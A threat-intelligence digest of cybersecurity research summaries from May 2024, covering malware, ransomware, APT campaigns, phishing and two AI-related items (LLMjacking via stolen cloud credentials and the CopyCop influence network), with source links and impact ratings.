Summary:: ESET researchers have uncovered the Lunar toolset, believed to be wielded by the Turla APT group, infiltrating a European ministry of foreign affairs (MFA) and its diplomatic missions abroad. This comprehensive analysis delves into two newly discovered backdoors, LunarWeb and LunarMail, employed in these breaches. Operating since at least 2020, the Lunar toolset employs advanced techniques like steganography and intricate communication methods to evade detection. The attackers, with a history of targeting high-profile entities, including governmental and diplomatic organizations, demonstrate sophisticated tactics. The post outlines victimology, initial access routes, and the complex workings of the Lunar toolset, shedding light on the intricate methods utilized by the threat actor.

Source: https://www.welivesecurity.com/en/eset-research/moon-backdoors-lunar-landing-diplomatic-missions/

Intel Source:: Palo Alto

Intel Name:: Embedded_payloads_abuse_Microsoft_OneNote_files

Date of Scan:: 2024-05-16

Impact:: MEDIUM

Summary:: The article by Ashkan Hosseosh Chitwadgi from Palo Alto Networks' Unit 42 blog discusses the increasing use of Microsoft OneNote for embedding malicious payloads, primarily for phishing. Analyzing around 6,000 OneNote samples, reveals that 99.9% contain images to lure users. Attackers exploit OneNote's flexibility to embed various payloads like JavaScript, VBScript, PowerShell, and HTA, shifting from traditional macros. The article details the payload types, sizes, and methods to identify them, emphasizing the need for robust cybersecurity measures, including Palo Alto Networks' solutions. It concludes with a technical analysis of a specific payload, highlighting OneNote's versatility as an attack vector.

Source: https://unit42.paloaltonetworks.com/payloads-in-malicious-onenote-samples/

Intel Source:: Symantec

Intel Name:: The_Toolkit_Added_a_New_Linux_Backdoor_Named_Springtail

Date of Scan:: 2024-05-16

Impact:: MEDIUM

Summary:: Researchers from Symantec have discovered a new Linux backdoor developed by the North Korean espionage group Springtail, also known as Kimsuky. This backdoor is connected to malware that was recently used in an attack on South Korean organizations. The GoBear backdoor, which was used in a recent Springtail campaign in which the attackers distributed malware through Trojanized software installation packages, looks to be a Linux version of the Linux.Gomir backdoor. Gomir and GoBear share a great deal of code, making them nearly architecturally identical.

Source: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/springtail-kimsuky-backdoor-espionage

Intel Source:: Trend Micro

Intel Name:: A_Deep_Dive_into_Waterbear_and_Deuterbear_Malware

Date of Scan:: 2024-05-16

Impact:: LOW

Summary:: TrendMicro researchers have delved into Earth Hundun's sophisticated cyberespionage campaign targeting the Asia-Pacific region, focusing on the Waterbear and Deuterbear malware variants. It provides detailed insights into their operation, installation processes, RAT functionalities, and a comparative analysis highlighting the evolution from Waterbear to Deuterbear.

Source: https://www.trendmicro.com/en_us/research/24/e/earth-hundun-2.html

Intel Source:: Checkpoint

Intel Name:: Exploitation_oF_FOXIT_PDF

Date of Scan:: 2024-05-15

Impact:: LOW

Summary:: Researchers at Checkpoint have discovered an unusual pattern of activity concerning the exploitation of PDFs, mostly aimed at Foxit Reader users. This exploit triggers security alerts that can trick unsuspecting users into executing harmful commands. Additionally, versions of this vulnerability were seen to be actively used in the wild. Since Adobe Reader is susceptible to this particular exploit, its low detection rate is explained by the reality that most sandboxes and antivirus programs use it. Furthermore, a variety of exploit builders—from Python to.NET code—are being used to distribute the exploitable vulnerability.

Source: https://research.checkpoint.com/2024/foxit-pdf-flawed-design-exploitation/

Intel Source:: Coinmonks

Intel Name:: LockBit_Resilience_Unveiled

Date of Scan:: 2024-05-15

Impact:: HIGH

Summary:: Researchers at Coinmonks have seen that the LockBit ransomware group makes a strong return despite law enforcement's efforts in Operation Cronos, showing flexibility in victimization tactics, infrastructure, and dissemination methods. The rumored identity of LockBitSupp has now come to light, adding mystery to the ransomware scene, which is further complicated by affiliates and imitators.

Source: https://medium.com/coinmonks/the-return-of-lockbit-8d7bcb9b75fa

Intel Source:: Cyble

Intel Name:: Transparent_Tribe_And_SideCopy_APT_Groups_Targeting_India

Date of Scan:: 2024-05-15

Impact:: MEDIUM

Summary:: Cyble Research team recently discovered a malicious website associated with the SideCopy APT group. The researchers noticed that SideCopy targeted university students, as evidenced by the lure document. Notably, Transparent Tribe is known for targeting universities, suggesting a potential intersection between these two APT groups.

Source: https://cyble.com/blog/the-overlapping-cyber-strategies-of-transparent-tribe-and-sidecopy-against-india/

Intel Source:: ESET

Intel Name:: Ebury_Malware_Campaign

Date of Scan:: 2024-05-15

Impact:: MEDIUM

Summary:: The ESET research team have uncovered a persistent and evolving server-side malware campaign known as Ebury which are growing over the years to compromise thousands of servers. Researchers uses special traps to catch Ebury, but the increasing difficulty of the malware has made detection more challenging. The hackers behind Ebury target companies that rent out servers and use a sneaky trick to intercept passwords. They've hit over 200 servers, especially those used for cryptocurrency. Ebury steals cryptocurrency wallets when people log in, leading to over 400,000 servers being hacked since 2009. Some new types of malwares connected to Ebury can also steal financial information from websites.

Source: https://www.welivesecurity.com/en/eset-research/ebury-alive-unseen-400k-linux-servers-compromised-cryptotheft-financial-gain/

Intel Source:: Forcepoint

Intel Name:: Exposing_the_Darkgate_Campaign

Date of Scan:: 2024-05-15

Impact:: LOW

Summary:: Researchers from Forcepoint have examined the details of a recent Darkgate phishing campaign. This investigation reveals attackers subtle strategies and advanced capabilities, from the initial lure of a fake QuickBooks invoice to the delivery of complicated malware payloads.

Source: https://www.forcepoint.com/blog/x-labs/phishing-script-inside-darkgate-campaign

Intel Source:: Proofpoint

Intel Name:: LockBit_Black_Ransomware_Spreading_Through_Millions_of_Messages

Date of Scan:: 2024-05-14

Impact:: HIGH

Summary:: Researchers at Proofpoint have seen large-scale campaigns that use millions of messages to spread the ransomware LockBit Black, made possible by the Phorpiex botnet. This is the first time Proofpoint researchers have seen so many samples of LockBit Black ransomware (also known as LockBit 3.0) spreads via Phorpiex. The LockBit Black sample from this campaign was most likely generated using the LockBit builder that was disclosed in the summer of 2023.

Source: https://www.proofpoint.com/us/blog/threat-insight/security-brief-millions-messages-distribute-lockbit-black-ransomware

Intel Source:: Rapid7

Intel Name:: Ongoing_Social_Engineering_Campaign_Linked_to_Black_Basta_Ransomware

Date of Scan:: 2024-05-14

Impact:: MEDIUM

Summary:: Rapid7 researchers have discovered an ongoing social engineering activity that has targeting multiple managed detection and response (MDR) customers. The event involves a threat actor inundating a user's email with spam and calling the person to offer assistance. The threat actor instructs affected customers to use Microsoft's built-in Quick Assist feature or download remote monitoring and management tools such as AnyDesk in order to create a remote connection. After establishing a remote connection, the threat actor proceeds to extract payloads from their infrastructure with the aim of obtaining the credentials of the affected user and continuing to remain persistent on the affected user's asset.

Source: https://www.rapid7.com/blog/post/2024/05/10/ongoing-social-engineering-campaign-linked-to-black-basta-ransomware-operators/

Intel Source:: Recorded Future

Intel Name:: Examining_SolarMarker_Multi_tiered_Infrastructure_in_Depth

Date of Scan:: 2024-05-14

Impact:: MEDIUM

Summary:: Researchers from the Insikt Group have discovered the multi-tiered infrastructure that is employed by the information-stealing malware known as SolarMarker, which has been around since 2020 and is also known as Yellow Cockatoo, Polazert, and Jupyter Infostealer. The malware targets industries like SMEs, healthcare, and education. It uses sophisticated evasion methods, such as Authenticode certificates and large zip files, to evade detection.

Source: https://go.recordedfuture.com/hubfs/reports/cta-2024-0513.pdf

Intel Source:: GBhackers

Intel Name:: The_North_Korean_hacking_group_Kimsuky_latest_activity

Date of Scan:: 2024-05-14

Impact:: MEDIUM

Summary:: The North Korean hacking group Kimsuky has been observed using sophisticated methods to conduct espionage activities, including the exploitation of social media platforms and system management tools.

Source: https://gbhackers.com/north-korean-hackers-abusing/

Intel Source:: ASEC

Intel Name:: The_Menace_Hidden_in_Job_Application_Emails

Date of Scan:: 2024-05-14

Impact:: LOW

Summary:: AhnLab's Security Intelligence Center researchers have delved into the intricacies of DanaBot malware, exposing its propagation via email attachments containing external links. Through a series of diagrams generated by AhnLab's EDR product, the post delineates the infection flow, from the initial email attachment execution to the deployment of DanaBot. The sophisticated disguise of the email as a job application form underscores the deceptive tactics employed by threat actors.

Source: https://asec.ahnlab.com/en/65399/

Intel Source:: Recorded Future

Intel Name:: Github_Repository_for_Malicious_Infrastructure

Date of Scan:: 2024-05-14

Impact:: MEDIUM

Summary:: The Insikt Group uncovered the big cybercrime campaign run by Russian-speaking cybercriminals from the Commonwealth of Independent States (CIS) used fake profiles and repositories on GitHub to distribute malware masquerading as popular software like 1Password and Pixelmator Pro. This Malware is aiming to steal personal information. These hackers workes together and share a control system, showing a complex attack plan.

Source: https://www.recordedfuture.com/gitcaught-threat-actor-leverages-github-repository-for-malicious-infrastructure

Intel Source:: ASEC

Intel Name:: Malware_disguised_as_MS_Office_crack

Date of Scan:: 2024-05-14

Impact:: LOW

Summary:: ASEC analysts reported the details of an ongoing malware campaign targeting South Korean users, which disguises malicious payloads as cracked versions of Microsoft Office and other popular software. The attackers are distributing a variety of malware, including downloaders, coin miners, remote access tools (RATs), proxies, and anti-antivirus components. These are installed persistently through scheduled tasks and utilize encoded PowerShell commands for updates. The primary malware families identified include Orcus RAT for system control, XMRig crypto-miner, 3Proxy for creating a proxy network, and components to evade security products.

Source: https://asec.ahnlab.com/ko/65307/

Intel Source:: Cyble

Intel Name:: A_Newly_Identified_Ransomware_Variant_Trinity

Date of Scan:: 2024-05-14

Impact:: LOW

Summary:: CRIL researchers have observed a new ransomware variant called Trinity. This variant employs a double extortion technique to target victims. The Threat Actors behind Trinity ransomware utilize both victim support and data leak sites. CRIL also observed similarities between Trinity and Venus ransomware, such as registry value usage and mutex naming conventions.

Source: https://cyble.com/blog/in-the-shadow-of-venus-trinity-ransomwares-covert-ties/

Intel Source:: Rapid7

Intel Name:: The_distribute_of_trojanized_installers_for_WinSCP_and_PuTTY

Date of Scan:: 2024-05-14

Impact:: MEDIUM

Summary:: Rapid 7 analysts discussed in their blog an ongoing malvertising campaign that leads to ransomware attacks. The campaign involves distributing trojanized installers for popular utilities through malicious ads on search engines. The malware uses various techniques, such as DLL side-loading and reflective DLL injection, to evade detection and establish persistence. The article also provides a technical analysis of the malware delivery and execution process, as well as a list of files and indicators associated with the campaign. It concludes with recommendations for mitigating the threat and preventing similar campaigns in the future.

Source: https://www.rapid7.com/blog/post/2024/05/13/ongoing-malvertising-campaign-leads-to-ransomware/

Intel Source:: Threatdown

Intel Name:: FakeBat_malware_loader

Date of Scan:: 2024-05-13

Impact:: LOW

Summary:: FakeBat (EugenLoader) is a malware loader type that is packaged in Microsoft installers (MSI or MSIX) distributed via social engineering lures. It is most commonly delivered via malicious ads (malvertising) on Google.

Source: https://www.threatdown.com/blog/fakebat-05-05-2024/

Intel Source:: ASEC

Intel Name:: Ransomware_Disguised_in_Copyright_Violation_Warnings_and_Resumes

Date of Scan:: 2024-05-13

Impact:: LOW

Summary:: ASEC researchers have revealed a surge in malware distribution camouflaged as copyright violation notices and job resumes, targeting unsuspecting users. The evolution in tactics includes employing external links in emails to prompt downloads of compressed files containing ransomware and Infostealers. The analysis unveils the intricacies of the Beast ransomware, encrypting files and seeking lateral movement via SMB ports, alongside the Vidar Infostealer, adept at extracting sensitive user data.

Source: https://asec.ahnlab.com/en/65364/

Intel Source:: Palo Alto

Intel Name:: AnotherP_Fake_Forum_Post_Leads_to_GootLoader_Malware

Date of Scan:: 2024-05-13

Impact:: LOW

Summary:: Palo Alto researchers have discovered that a Google search on a certain topic leads in a compromised website that contains a fake forum post and a zip file that can be downloaded. Additionally, wscript.exe launches the downloaded zip file's.js file, GootLoader C2, and post-infection activity.

Source: https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2024-05-09-IOCs-from-GootLoader-activity.txt

Intel Source:: G DATA

Intel Name:: GoTo_Meeting_Leverages_Rust_Shellcode_Loader_to_Initiate_Remcos_RAT_Execution

Date of Scan:: 2024-05-13

Impact:: LOW

Summary:: G DATA researchers have discovered that cyber attackers exploit trusted applications like GoTo Meeting to deploy malware such as the Remcos RAT. The attack involves disguising malicious payloads within inoffensive files and initiating events that evade detection. Techniques like DLL sideloading and shellcode execution are utilized, alongside decoy documents, to lower suspicion. The attack's complexity extends to various languages and tailored lures, targeting diverse user groups.

Source: https://www.gdatasoftware.com/blog/2024/05/37906-gotomeeting-loads-remcos

Intel Source:: Palo Alto

Intel Name:: Three_recent_campaigns_using_DNS_tunneling

Date of Scan:: 2024-05-13

Impact:: MEDIUM

Summary:: Palo Alto research team shared the details of their case study on new applications of domain name system (DNS) tunneling that they found in the wild. These techniques expand beyond DNS tunneling only for command and control (C2) and virtual private network (VPN) purposes.

Source: https://unit42.paloaltonetworks.com/three-dns-tunneling-campaigns/

Intel Source:: Antiy

Intel Name:: A_new_mining_Trojan_attack

Date of Scan:: 2024-05-11

Impact:: LOW

Summary:: Recently, Antiy CERT observed a new mining Trojan attack through network security monitoring. This mining Trojan started back in November 2023, and its components were vhanged many times during this period. The mining Trojan attack continues to be active, and the number of infections is on the rise. The main features are strong concealment, anti-analysis, DLL hijacking backdoor and shellcode injection, etc. Antiy CERT named the mining Trojan "Hidden Shovel".

Source: https://www.antiy.cn/research/notice&report/research_report/HideShoveling.html

Intel Source:: SOC Radar

Intel Name:: Analysis_of_Dark_Web_Profile_APT31

Date of Scan:: 2024-05-10

Impact:: LOW

Summary:: SOC Radar researchers have analyzed the APT31, a sophisticated cyber threat group believed to operate on behalf of the Chinese government. It highlights their tactics, including malware deployment and spear-phishing campaigns, and discusses a recent indictment by the United States Department of Justice charging seven individuals associated with APT31 for conspiracy to commit computer intrusions and wire fraud. The summary emphasizes APT31's targeting of various entities, including U.S. government officials and businesses, and offers security recommendations to mitigate the threat posed by this group. Overall, it underscores the importance of vigilance and robust cybersecurity measures in countering APT31's activities.

Source: https://socradar.io/dark-web-profile-apt31/

Intel Source:: Sysdig

Intel Name:: Attack_on_Cloud_Hosted_AI_Models_via_LLMjacking_Scheme

Date of Scan:: 2024-05-10

Impact:: MEDIUM

Summary:: Researchers at Sysdig have discovered a new attack called LLMjacking, which targets ten cloud-hosted large language model (LLM) services by using credentials that have been stolen from the cloud. The credentials were taken from a well-known target, a machine running a vulnerable Laravel version (CVE-2021-3129).

Source: https://sysdig.com/blog/llmjacking-stolen-cloud-credentials-used-in-new-ai-attack/

Intel Source:: CISA

Intel Name:: Black_Basta_ransomware_activity_details

Date of Scan:: 2024-05-10

Impact:: HIGH

Summary:: CISA cooperating with the FBI, the HHS, and the Multi-State Information Sharing and Analysis Center (MS-ISAC) released together a security advisory about Black Basta ransomware providing cybersecurity defenders tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) used by Black Basta is a ransomware-as-a-service (RaaS) variant, first discovered in April 2022. Black Basta has attacked over 500 private industry and critical infrastructure entities, including healthcare organizations, in North America, Europe, and Australia.

Source: https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-131a

Intel Source:: Sentilone

Intel Name:: A_new_macOS_malware_family_Cuckoo_Stealer

Date of Scan:: 2024-05-10

Impact:: LOW

Summary:: This year infostealers have been targeting macOS devices and have been on the rise lately with variants such as Atomic Stealer (Amos), RealStealer (Realst), MetaStealer, and others who were widely distributed in the wild by malicious websites, cracked applications, and trojan installers. Recently. it triggered Sentilone attention to a new macOS malware family that researchers have named ‘Cuckoo Stealer’, which triggered their attention to its capabilities to be at the same time an infostealer and spyware.

Source: https://www.sentinelone.com/blog/macos-cuckoo-stealer-ensuring-detection-and-defense-as-new-samples-rapidly-emerge/

Intel Source:: Esentire

Intel Name:: SocGholish_infection_initiated_by_a_fake_browser_update

Date of Scan:: 2024-05-09

Impact:: LOW

Summary:: eSentire’s Threat Unit provided a summary of the details of a recent threat investigation. Last month, eSentire's Threat Unit researchers observed and could trace the hands-on-keyboard activity to a SocGholish infection initiated by a fake browser update. The fake update used obfuscated JavaScript to evade detection and establish a foothold in the environment.

Source: https://www.esentire.com/blog/socgholish-sets-sights-on-victim-peers

Intel Source:: Recorded Future

Intel Name:: CopyCop_campaign_weaponizing_AI_for_influence

Date of Scan:: 2024-05-09

Impact:: MEDIUM

Summary:: Back in March, 20244, Insikt Group discovered a powerful network using inauthentic United States (US), United Kingdom (UK), and French media outlets to publish political content at scale using large language models (LLMs) related to the US, UK, Ukraine, Israel, and France. It was identified by Insikt Group as CopyCop and this network is operated from Russia and is likely aligned with the Russian government. The network uses generative artificial intelligence (AI) to plagiarize, translate, and edit content from mainstream media outlets, using prompt engineering to tailor content to specific audiences and introduce political bias.

Source: https://go.recordedfuture.com/hubfs/reports/cta-2024-0509.pdf

Intel Source:: CERT-AGID

Intel Name:: Phishing_Scam_Exploiting_Italian_Government_Name_and_Tax_Refund_Promise

Date of Scan:: 2024-05-09

Impact:: MEDIUM

Summary:: CERT-AGID researchers have identified a concerning phishing campaign targeting Italian citizens, which falsely promises tax refunds while exploiting the name and logos of the Presidency of the Council of Ministers. The phishing emails claim recipients are entitled to a refund of €268.30 and create a sense of urgency by stating the offer expires within five working days. Recipients are directed to click a link that redirects them to a fraudulent page, aiming to trick them into providing their banking credentials.

Source: https://cert-agid.gov.it/news/phishing/phishing-multibanking-sfrutta-nome-e-loghi-della-presidenza-del-consiglio-dei-ministri/

Intel Source:: Esentire

Intel Name:: FIN7_distributes_MSIX_payloads

Date of Scan:: 2024-05-09

Impact:: LOW

Summary:: Last month, eSentire’s Threat Unit researchers discovered multiple instances involving FIN7, a financially motivated threat group from Russia. The threat actors used malicious websites to copy well-known brands, like AnyDesk, WinSCP, BlackRock, Asana, Concur, The Wall Street Journal, Workable, and Google Meet. In their article eSentire Threat Unit, they looked at these incident cases with FIN7 delivering NetSupport RAT and DiceLoader for the subsequent stage in the infection chain.

Source: https://www.esentire.com/blog/fin7-uses-trusted-brands-and-sponsored-google-ads-to-distribute-msix-payloads

Intel Source:: CERT.PL

Intel Name:: APT_28_Targeting_against_Polish_govt_instituitons

Date of Scan:: 2024-05-09

Impact:: MEDIUM

Summary:: CERT Polska has observed a malicious e-mail campaign conducted by the APT28 group against Polish government institutions. This group is associated with General Staff of the Armed Forces of the Russian Federation (GRU). In this campaign attacker sent an email with a message about finding information on a woman from Ukraine who's in Poland, running a strange business. The email had a link that led to a fake website where a ZIP file was downloaded. Inside the ZIP file were three files: a fake photo file that was a program, a hidden batch file, and a fake Windows library file.

Source: https://cert.pl/en/posts/2024/05/apt28-kampania/

Intel Source:: ASEC

Intel Name:: RemcosRAT_Spreading_Using_Steganography

Date of Scan:: 2024-05-08

Impact:: LOW

Summary:: Researchers from ASEC have discovered that RemcosRAT is being distributed via steganography. Using the template injection technique, an attack starts with a Word document. Next, an RTF is downloaded and run to take advantage of an equation editor vulnerability (EQNEDT32.EXE).

Source: https://asec.ahnlab.com/en/65111/

Intel Source:: Tqt-group

Intel Name:: Meterpreter_backdoor_being_distributed_from_a_Korean_website

Date of Scan:: 2024-05-08

Impact:: LOW

Summary:: ASEC has observed evidence of a malware strain being distributed to web servers in South Korea, taking users to an illegal gambling site. After initially infiltrating a poorly managed Windows Internet Information Services (IIS) web server in Korea, the threat actor installed the Meterpreter backdoor, a port forwarding tool, and an IIS module malware tool. The attacker has a goal to collect information on the attack target before installing the IIS module malware.

Source: https://tqt-group.co.uk/2024/05/08/case-of-malware-distribution-linking-to-illegal-gambling-website-targeting-korean-web-server/

Intel Source:: Threatdown

Intel Name:: The_malicious_download_leads_to_Nitrogen_malware

Date of Scan:: 2024-05-08

Impact:: LOW

Summary:: Threatdown analysts discuss in their blog about tricking potential victims as well as system administrators with an ad for Advanced IP Scanner, a well-known networking tool. The malicious download leads to Nitrogen malware that is used as initial access for ransomware deployment.

Source: https://www.threatdown.com/blog/nitrogen-05-03-2024/

Intel Source:: Threatdown

Intel Name:: The_details_of_a_Medusa_ransomware_attack

Date of Scan:: 2024-05-08

Impact:: MEDIUM

Summary:: Last month, a prominent service chain in the United States became a victim of a Medusa ransomware attack. Threatdown analysts studied the attack’s framework, exploring the chronological events, key indicators of compromise (IOCs), and steps the ThreatDown MDR team took to mitigate the infection.

Source: https://www.threatdown.com/blog/the-anatomy-of-a-medusa-ransomware-attack-threatdown-mdr-team-investigates/

Intel Source:: Juniper

Intel Name:: The_observed_instances_of_Mirai_botnet_delivery_in_the_wild

Date of Scan:: 2024-05-08

Impact:: HIGH

Summary:: Juniper researchers observed the exploitation attempts targeting an Ivanti Pulse Secure authentication bypass with remote code execution vulnerabilities. Also, they discovered instances of Mirai botnet delivery in the wild, using this exploit with remote code execution capabilities. This exploit facilitates malware delivery, posing a significant threat to compromise entire networks.

Source: https://blogs.juniper.net/en-us/security/protecting-your-network-from-opportunistic-ivanti-pulse-secure-vulnerability-exploitation

Intel Source:: Fortinet

Intel Name:: The_Distribution_of_zEus_Stealer

Date of Scan:: 2024-05-08

Impact:: MEDIUM

Summary:: Researchers from Fortinet examined a batch stealer distributed via a crafted Minecraft source pack which is embedded in a WinRAR self-extract file. The zEus stealer malware has been added to a source pack that was being shared on YouTube. The "zEus" name is also found in a profile of the Discord webhook receiving stolen data.

Source: https://www.fortinet.com/blog/threat-research/zeus-stealer-distributed-via-crafted-minecraft-source-pack

Intel Source:: ASEC

Intel Name:: CHM_Malware_Targeting_Users_in_Korea

Date of Scan:: 2024-05-08

Impact:: LOW

Summary:: ASEC researchers have discovered a CHM malware strain in Korea that steals user information. This malware has been distributed in various formats such as LNK, DOC, and OneNote for some time.

Source: https://asec.ahnlab.com/en/65245/

Intel Name:: Asynchronous_Remote_Access_Trojan

Date of Scan:: 2024-05-08

Impact:: LOW

Summary:: McAfee labs have uncovered the highly sophisticated malware variant which is designed for stealing the confidential data. It is really hard to detect this malware because it uses different kinds of files, like PowerShell and VBScript, hidden inside an HTML file. When someone opens an infected email and clicks on a link, it starts a chain reaction that downloads these harmful files onto their computer without them even knowing. Once it's in your system, it can do a lot of damage.

Source: https://www.mcafee.com/blogs/other-blogs/mcafee-labs/from-spam-to-asyncrat-tracking-the-surge-in-non-pe-cyber-threats/

Intel Source:: Threatdown

Intel Name:: A_ransomware_affiliated_with_LockBit_Black_malware

Date of Scan:: 2024-05-08

Impact:: MEDIUM

Summary:: Some lure email from malicious campaign was observed last month and were initiated by ransomware connected to LockBit Black (AKA LockBit 3.0). This LockBit Black malware sample was spread by a malspam campaign using the Phorpiex botnet. The email with the subject “Your Document” contains a zipped attachment.

Source: https://www.threatdown.com/blog/lockbitblack-05-01-2024/

Intel Source:: ASEC

Intel Name:: Targeted_Malware_Threatens_South_Korean_Users_via_Shortcut_Files

Date of Scan:: 2024-05-07

Impact:: LOW

Summary:: ASEC researchers have issued a warning regarding the continuous distribution of malicious shortcut files (*.LNK) disseminating backdoor-type malware, particularly targeting South Korean users, especially those associated with North Korea. The malware, resembling previous RokRAT incidents, disguises itself within legitimate document files and executes PowerShell commands upon activation. Upon execution, it creates and executes additional files, facilitating the transmission of collected information to threat actors' cloud servers.

Source: https://asec.ahnlab.com/en/65076/

Intel Source:: MITRE-Engenuity

Intel Name:: Sophisticated_Cyberattack_Targeting_MITRE_NERVE_Network

Date of Scan:: 2024-05-07

Impact:: HIGH

Summary:: A recent cyberattack on MITRE's NERVE network, likely orchestrated by a China-linked cyberespionage group, UNC5221, exploited zero-day vulnerabilities in Ivanti Connect Secure VPN devices. The attackers gained access on December 31, 2023, deploying malicious payloads to establish control and exfiltrate data by January 19, 2024. The detection happened in April, but it affected multiple organizations. As a result, MITRE shared technical information and indicators of compromise (IoCs) for mitigation. The significance of timely patch management and proactive cybersecurity procedures in thwarting sophisticated attacks is highlighted by this incident.

Source: https://medium.com/mitre-engenuity/technical-deep-dive-understanding-the-anatomy-of-a-cyber-intrusion-080bddc679f3

Intel Source:: Zscaler

Intel Name:: Updates_on_HijackLoader

Date of Scan:: 2024-05-07

Impact:: LOW

Summary:: Researchers at Zscalar have tracked upgrades for HijackLoader and have produced a Python script that extracts malware modules and configuration from samples of HijackLoader. They also examine the malware families that HijackLoader used between March 2024 and April 2024.

Source: https://www.zscaler.com/blogs/security-research/hijackloader-updates#indicators-of-compromise--iocs-

Intel Source:: Esentire

Intel Name:: The_new_MaaS_Loader

Date of Scan:: 2024-05-06

Impact:: LOW

Summary:: Last month, eSentire's Threat Response analysts observed multiple activities of D3F@ck Loader infections being spread via Google Ads. This new loader, which started back in January 2024 is capable bypass several key security features such as Google Chrome, Edge, Windows Defender alerts, and SmartScreen.

Source: https://www.esentire.com/blog/d3f-ck-loader-the-new-maas-loader

Intel Source:: IC3

Intel Name:: North_Korean_actors_exploit_weak_DMARC_Security_Policies

Date of Scan:: 2024-05-06

Impact:: MEDIUM

Summary:: The FBI, and the NSA are jointly issuing this advisory to highlight attempts by Democratic People’s Republic of Korea (DPRK, a.k.a. North Korea) Kimsuky cyber actors to exploit improperly configured DNS Domain-based Message Authentication, Reporting and Conformance (DMARC) record policies to conceal social engineering attempts.

Source: https://www.ic3.gov/Media/News/2024/240502.pdf

Intel Source:: Sucuri

Intel Name:: A_new_Mal_Metrica_redirect_scam

Date of Scan:: 2024-05-06

Impact:: LOW

Summary:: Recently, a Sucuri analyst discovered a new Mal.Metrica redirects scam on compromised websites. It told the analysts that web users should be very careful what they click on, and to be wary of anything suspicious that pops up in their browser — even if it’s coming from a website that they would otherwise trust. When visiting an infected website the users are prompted with a (fake) human verification prompt.

Source: https://blog.sucuri.net/2024/05/mal-metrica-redirects-users-to-scam-sites.html

Intel Source:: CERT-AGID

Intel Name:: Keylogger_Malware_Spreads_via_Fake_Revenue_Agency

Date of Scan:: 2024-05-06

Impact:: LOW

Summary:: CERT-AGID researchers have discovered a sophisticated attempt at fraud employing a fake Internal Revenue Agency page that was hosted on a compromised Italian domain and intended to infect victims with keylogger malware. Visiting the page immediately downloads a zipped file called " MODULO_RIMBORSO_AGENZIA_ENTRATE.PDF.ZIP ", which contains an executable developed in VB6. This file is responsible for downloading an additional component to Altervista over FTP, which was also written in VB6 and includes keylogger capability, hence the name VBLogger.

Source: https://cert-agid.gov.it/news/malware/diffusione-di-malware-keylogger-tramite-falsa-pagina-di-agenzia-delle-entrate-puntofisco/

Intel Source:: Threatdown

Intel Name:: Malicious_ads_and_modals_target_corporate_users

Date of Scan:: 2024-05-06

Impact:: MEDIUM

Summary:: Threatdown analysts discuss in their blog a new campaign targeting corporate users through malicious ads and modals. The threat actors have created fake websites impersonating well-known brands and products used in the corporate world. The attack is initiated through Google ads, redirecting users to a cloaking service and then to a final URL where a modal appears, prompting users to download a supposed browser extension.

Source: https://www.threatdown.com/blog/corporate-users-targeted-via-malicious-ads-and-modals/

Intel Source:: Permiso

Intel Name:: The_observation_of_a_large_scale_credential_stuffing_attack

Date of Scan:: 2024-05-06

Impact:: LOW

Summary:: Permiso analysts discuss a recent credential stuffing attack observed by Okta on April 26, 2024, which targeted VPN devices. The attack shifted to password spraying against Okta clients on April 19 and was not very successful. The majority of attempts came from residential proxies and TOR, and Permiso recommends reviewing user.session.start events for successful authentication.

Source: https://permiso.io/blog/latest-okta-credential-stuffing-campaign

Intel Source:: Medium

Intel Name:: A_family_of_voice_phishing_apps_distributed_in_South_Korea

Date of Scan:: 2024-05-03

Impact:: LOW

Summary:: Voice phishing groups in South Korea build phishing pages and apps like SecretCalls to trick victims into installing malware and accessing phishing sites for financial fraud. Detailed analysis of SecretCalls Loader reveals anti-analysis techniques like DEX encryption, emulator detection, and installing additional apps before loading SecretCalls for remote control.

Source: https://medium.com/s2wblog/secretcalls-spotlight-a-formidable-app-of-notorious-korean-financial-fraudster-part-1-fa4bbed855c0

Intel Source:: Sentilone

Intel Name:: macOS_Adload_new_samples

Date of Scan:: 2024-05-03

Impact:: LOW

Summary:: Researchers from SentinelOne observed a new variant of the Adload adware that evades Apple's recent XProtect malware signature updates. Despite Apple adding 74 new rules targeting Adload in XProtect version 2192, the adware authors have rapidly modified their code to bypass these detections. The report examines a specific 4.55MB Intel x86_64 dropper sample that employs Go language components and connects to hardcoded domains for retrieving next-stage payloads. While undetected by most antivirus engines on VirusTotal, SentinelOne's multi-engine platform effectively identifies and blocks this Adload variant.

Source: https://www.sentinelone.com/blog/macos-adload-prolific-adware-pivots-just-days-after-apples-xprotect-clampdown/

Intel Source:: Kandji

Intel Name:: A_previously_undetected_malicious_Mach_O_binary_programmed_malware_Cuckoo

Date of Scan:: 2024-05-03

Impact:: LOW

Summary:: On April 24, 2024, Kandji analysts found a previously undetected malicious Mach-O binary programmed to behave like a cross between spyware and an infostealer. They named it the malware Cuckoo, after the bird that lays its eggs in the nests of other birds and steals the host's resources for the gain of its young.

Source: https://blog.kandji.io/malware-cuckoo-infostealer-spyware

Intel Source:: Symantec

Intel Name:: An_increasing_number_of_cyber_attacks_with_the_use_of_the_Microsoft_Graph_API

Date of Scan:: 2024-05-03

Impact:: LOW

Summary:: An increasing number of cyber threats have adopted the use of the Microsoft Graph API to facilitate covert communications with command-and-control infrastructure hosted on Microsoft cloud services. This technique helps attackers blend in with legitimate traffic to cloud platforms and obtain infrastructure at a low cost.

Source: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/graph-api-threats

Intel Source:: Trend Micro

Intel Name:: The_danger_of_internet_facing_routers

Date of Scan:: 2024-05-03

Impact:: MEDIUM

Summary:: Researchers at Trend Micro have observed the activity of cybercriminals and nation-states actors are collaborating in exploiting compromised networks, as seen in a botnet using Ubiquiti EdgeRouters devices which was already disordered by the FBI. Hundreds of Ubiquiti EdgeRouters being used for different purposes, such as brute forcing, pharmaceutical spam, employing server message block (SMB) reflectors in NTLMv2 hash relay attacks, proxying stolen credentials on phishing sites, and sending spear phishing e-mails. Apart from EdgeRouters compromised Raspberry Pi and other internet-facing devices in the botnet.

Source: https://www.trendmicro.com/en_us/research/24/e/router-roulette.html

Intel Source:: Google-owned Mandiant

Intel Name:: Hackers_With_Iranian_State_Support_Are_Still_Posing_as_Think_Tanks_and_Media_Outlets

Date of Scan:: 2024-05-03

Impact:: MEDIUM

